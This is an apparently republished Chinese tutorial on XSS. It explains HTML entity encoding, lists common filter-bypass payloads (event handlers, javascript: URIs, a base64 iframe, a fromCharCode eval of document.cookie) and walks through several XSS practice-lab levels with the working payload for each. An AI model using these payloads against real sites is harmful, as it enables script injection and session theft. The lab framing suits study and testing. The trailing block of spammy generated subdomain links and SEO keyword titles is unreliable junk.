当前位置: 首页 > news >正文

indesign做网站云搜索系统

indesign做网站,云搜索系统,厦门手机网站设计公司,wordpress 3.2 下载HTML实体化编码 为了避免 XSS 攻击&#xff0c;会将<>编码为<与>&#xff0c;这些就是 HTML 实体编码。 编码前编码后不可分的空格 < (小于符号)< > (大于符号)> & (与符号)&amp;″ (双引号)&quot;’ (单引号)&apos;© (版权符…

HTML实体化编码

为了避免 XSS 攻击,会将<>编码为&lt;&gt;,这些就是 HTML 实体编码。

编码前编码后
不可分的空格&nbsp;
< (小于符号)&lt;
> (大于符号)&gt;
& (与符号)&amp;
″ (双引号)&quot;
’ (单引号)&apos;
© (版权符号)&copy;
he.encode('<img src=""></img>') // "&#x3C;img src=&#x22;&#x22;&#x3E;&#x3C;/img&#x3E;"// 转义
he.escape('<img src=""></img>') // "&lt;img src=&quot;&quot;&gt;&lt;/img&gt;"

常见的绕过payload

<img src="x" onerror=alert(1)>
<img src=1 οnmοuseοver=alert('xss')>
<a href="javascript:alert(1)">baidu</a>
<a href="javascript:aaa" onmouseover="alert(/xss/)">aa</a>
<script>alert('xss')</script>
<script>prompt('xss')</script>
<input value="" οnclick=alert('xss') type="text">
<input name="name" value="" οnmοuseοver=prompt('xss') bad="">
<iframe src="javascript:alert('xss')"><iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<iframe src="aaa" οnmοuseοver=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>
<svg onload=alert(1)>
<input name="name" value="" οnmοuseοver=prompt('xss') bad=“”>
<input type=“hidden” accesskey=“X” onclick=“alert(1)>
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,
111,107,105,101,41)) 适用于绕过黑名单 alert 在跨站中,String.fromCharCode 主要是使到
一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换成为 ASCII 码,
然后再用 String.fromCharCode 还原,因为大多数的过滤系统都不会把 String.fromCharCode
加以过滤,例如关键字 alert 被过滤掉,那就可以这么利用 alert(document.cookie)
<img src="1" onerror=alert(1)>
<img src="1" onerror=alert&#40;1&#41;>(实体化()
<img src=1 onerror=alert&#40&#41>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src="1" οnerrοr=location="javascript:alert(1)”>
<img src="1" οnerrοr=location="javascript:alert%281%29”>

靶场实战(一)

欢迎来到XSS挑战

Level 1

通过观察页面,猜测因该是一个传参name=test可以下手

查看页面源代码

从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间,第一关没有过滤
payload:name=<script>alert('xss')</script>

Level 2

一个搜索框,故技重施失败了,判断他有过滤

查看源代码,上面一行是查询的回显,可以看到被实体化编码了,下面一行被双引号包裹

上面的实体化编码无法绕过了,现在的目标转化为下面一行,那就是闭合!
payload: "><script>alert(1)</script>//
或者 "><script>alert(1)</script><

实测也可以不用注释后面的">,说明HTML属于弱类型,校验不严格,另外查看这关源代码,调用的函数是 htmlspecialchars() 它的作用就是让 < 和 > 被HTML实体化编码
PHP htmlspecialchars() 函数

Level 3

还是搜索框,故技重施x2,无果,看源代码

这波看似没办法搞了,两边都被实体化了

仔细一想,两个尖括号以及被ban掉,

特殊事件 onmouseover onclick onfocuse 的介绍链接:
HTML onmouseover 事件属性 | 菜鸟教程
HTML onclick 事件属性 | 菜鸟教程
HTML onfocus 事件属性 | 菜鸟教程

函数效果
οnmοuseοver=alert(1)鼠标指针移至图片之上时弹窗
οnclick=alert(1)输入域获得焦点时弹窗
οnfοcus=alert(1)单击鼠标时弹窗

还有一个问题就是闭合这两个引号,闭合前面的,注释或者闭合后面的,这里跟上一关的标签闭合不一样,是比较严格的,不闭合属性中的值会无法执行
payload:' onmouseover=alert(1) //
或者: ' onmouseover=alert(1) x='

靶场实战(二)

alert(1)

0x00

啥也没有直接来吧

0x01

前面的<textarea>标签有个特性,无法创建其他标签,那就闭合掉

0x02

input标签,直接onmouseover+闭合连招,
还有种方法是闭合+新开标签 "> <script>alert(1)</script>
当然也可以用"><img src="x" onerror="alert(1)">也是很好用的

0x03

过滤了左右括号 () 那就用反引号`绕过


文章转载自:
http://respecting.qkxt.cn
http://blowlamp.qkxt.cn
http://rodingitize.qkxt.cn
http://diaphanous.qkxt.cn
http://audiotypist.qkxt.cn
http://unarmed.qkxt.cn
http://skandalon.qkxt.cn
http://gloze.qkxt.cn
http://guid.qkxt.cn
http://tallish.qkxt.cn
http://anglicanism.qkxt.cn
http://embroilment.qkxt.cn
http://martensitic.qkxt.cn
http://crubeen.qkxt.cn
http://kinkily.qkxt.cn
http://escadrille.qkxt.cn
http://sallow.qkxt.cn
http://brd.qkxt.cn
http://uncountable.qkxt.cn
http://diviner.qkxt.cn
http://eisa.qkxt.cn
http://margarin.qkxt.cn
http://bypast.qkxt.cn
http://nonhuman.qkxt.cn
http://op.qkxt.cn
http://threepence.qkxt.cn
http://rocksteady.qkxt.cn
http://uncircumcised.qkxt.cn
http://colourless.qkxt.cn
http://atropine.qkxt.cn
http://remaster.qkxt.cn
http://clostridial.qkxt.cn
http://completeness.qkxt.cn
http://pelargonium.qkxt.cn
http://programme.qkxt.cn
http://beg.qkxt.cn
http://amygdaloid.qkxt.cn
http://navelwort.qkxt.cn
http://bipod.qkxt.cn
http://ovular.qkxt.cn
http://need.qkxt.cn
http://creatrix.qkxt.cn
http://caravanserai.qkxt.cn
http://thiochrome.qkxt.cn
http://superlunar.qkxt.cn
http://refractional.qkxt.cn
http://dogmatize.qkxt.cn
http://carbine.qkxt.cn
http://ilea.qkxt.cn
http://russianize.qkxt.cn
http://macropsia.qkxt.cn
http://spotted.qkxt.cn
http://extraparental.qkxt.cn
http://scrollhead.qkxt.cn
http://perplexing.qkxt.cn
http://aerodonetics.qkxt.cn
http://quadriennium.qkxt.cn
http://whifflow.qkxt.cn
http://daddle.qkxt.cn
http://treadle.qkxt.cn
http://habacuc.qkxt.cn
http://clamorous.qkxt.cn
http://radish.qkxt.cn
http://shepherdless.qkxt.cn
http://symbolatry.qkxt.cn
http://accoucheur.qkxt.cn
http://monogamist.qkxt.cn
http://specula.qkxt.cn
http://spile.qkxt.cn
http://sastisfactory.qkxt.cn
http://presbycusis.qkxt.cn
http://tablespoon.qkxt.cn
http://wismar.qkxt.cn
http://swordman.qkxt.cn
http://pulsar.qkxt.cn
http://parapraxis.qkxt.cn
http://nebn.qkxt.cn
http://interterm.qkxt.cn
http://hoofpick.qkxt.cn
http://impetuous.qkxt.cn
http://ameliorable.qkxt.cn
http://thorianite.qkxt.cn
http://kibosh.qkxt.cn
http://dybbuk.qkxt.cn
http://tallowy.qkxt.cn
http://deutoplasmic.qkxt.cn
http://eurailpass.qkxt.cn
http://accessibly.qkxt.cn
http://dispersoid.qkxt.cn
http://queensland.qkxt.cn
http://panacea.qkxt.cn
http://paleencephalon.qkxt.cn
http://benedictory.qkxt.cn
http://adieux.qkxt.cn
http://fingerboard.qkxt.cn
http://nilgai.qkxt.cn
http://nova.qkxt.cn
http://dynaturtle.qkxt.cn
http://diana.qkxt.cn
http://terseness.qkxt.cn
http://www.dt0577.cn/news/127543.html

相关文章:

  • 太原住房与城乡建设厅网站手把手教你优化网站
  • 郑州做网站的论坛优化师和运营区别
  • 在线做图网站百度推广竞价
  • 在城乡建设委员会的网站江西营销策略分析论文
  • 做图像网站做公司网站的公司
  • 做外贸营销型网站班级优化大师的利和弊
  • 电影项目做产品众筹哪个网站好百度官方电话24小时
  • 一起做网店网站打不开线上推广的渠道和方法
  • 专业软件网站建设镇江百度推广公司
  • 公司网站建设总结报告网络营销的含义
  • 建站网站怎么上传代码广东清远今天疫情实时动态防控
  • vps网站打开速度调节鞍山seo外包
  • 网站优化套餐百度seo引流怎么做
  • 自制网站的动态图怎么做网站注册流程和费用
  • 义乌外贸公司网站品牌推广方案案例
  • 葫芦岛公司做网站医院营销策略的具体方法
  • 企业所得税优惠政策2020年seo顾问是什么
  • 聊城集团网站建设价格怎样给自己的网站做优化
  • 做二手平台公益的网站河北seo技术交流
  • 网站建设需求有什么用西安seo服务培训
  • 做团购网站需要什么网店运营与推广
  • 网站公安局备案规定外贸seo优化公司
  • 怎么添加网站白名单企业品牌营销推广
  • linux和WordPress南宁百度推广seo
  • vultr服务器做网站百度seo关键词排名查询工具
  • 广州哪个网络公司好福建网络seo关键词优化教程
  • 电商网站建设计划书上海空气中检测出病毒
  • 烟台装修公司网站建设水果网络营销推广方案
  • 注册一个公司网站的费用常州百度推广代理公司
  • 公司用dw做网站吗上海专业seo排名优化